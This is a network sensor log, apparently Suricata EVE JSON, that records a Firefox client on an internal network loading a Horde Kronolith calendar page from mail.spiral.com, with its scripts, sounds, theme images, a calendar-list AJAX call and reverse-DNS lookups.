{"timestamp":"2020-02-29T00:22:32.332479+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":6}} {"timestamp":"2020-02-29T00:22:32.332753+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} {"timestamp":"2020-02-29T00:22:32.339316+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24826},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.341602+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:22:32.362889+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":7}} {"timestamp":"2020-02-29T00:22:32.363312+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:22:32.365078+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:22:32.365122+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} {"timestamp":"2020-02-29T00:22:32.366760+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.368121+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":8}} {"timestamp":"2020-02-29T00:22:32.370139+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.371064+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:22:32.409302+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:22:32.413250+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:22:32.456633+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.457564+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:22:32.458694+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":9}} {"timestamp":"2020-02-29T00:22:32.458965+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:22:32.459967+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":2}} {"timestamp":"2020-02-29T00:22:32.463130+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:22:32.466189+0000","flow_id":1506488481224280,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52962,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:22:32.463757+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":10}} {"timestamp":"2020-02-29T00:22:32.464795+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:22:32.466618+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:22:32.467428+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":11}} {"timestamp":"2020-02-29T00:22:32.468297+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.467174+0000","flow_id":1879111253891026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52966,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:22:32.468392+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:22:32.467975+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52964,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.468862+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":12}} {"timestamp":"2020-02-29T00:22:32.470541+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":2}} {"timestamp":"2020-02-29T00:22:32.471106+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:22:32.497612+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.497978+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:22:32.509315+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:22:32.509535+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} {"timestamp":"2020-02-29T00:22:32.509359+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:22:32.557018+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32535,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.582795+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.668240+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37972,"proto":"UDP","dns":{"type":"answer","id":32535,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.668240+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37972,"proto":"UDP","dns":{"type":"answer","id":32535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.740698+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:22:32.740698+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.740787+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.753213+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12947,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.763804+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":13}} 